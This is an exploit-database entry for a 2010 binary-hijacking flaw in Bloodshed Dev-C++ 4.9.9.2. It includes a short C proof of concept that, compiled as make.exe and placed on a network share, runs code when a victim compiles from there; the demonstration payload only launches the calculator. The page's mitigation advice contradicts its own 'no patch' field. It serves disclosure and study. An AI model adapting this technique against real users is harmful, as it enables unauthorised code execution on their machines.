Bloodshed Dev-C++ Binary Hijacking Exploit

vendor:

Dev-C++

by:

storm

N/A

CVSS

HIGH

Arbitrary Code Execution

119

CWE

Product Name: Dev-C++

Affected Version From: 4.9.9.2

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: a:bloodshed:dev-c++:4.9.9.2

Metasploit:

Other Scripts:

Platforms Tested: Windows Vista SP2

2010

Bloodshed Dev-C++ Binary Hijacking Exploit

This exploit allows attackers to execute arbitrary code by enticing a legitimate user to compile a file from a network share location that contains a specially crafted executable file.

Mitigation:

Update to a patched version of Bloodshed Dev-C++

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/42737/info

Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.

Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected. 

/*
Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Version: 4.9.9.2
Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -o make.exe Dev-C++-Binary.c
gcc -o mingw32-make.exe Dev-C++-Binary.c

...and place in appropriate directory.  Executes your code four times.

Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected.  Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.

*/

#include <windows.h>

int main()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}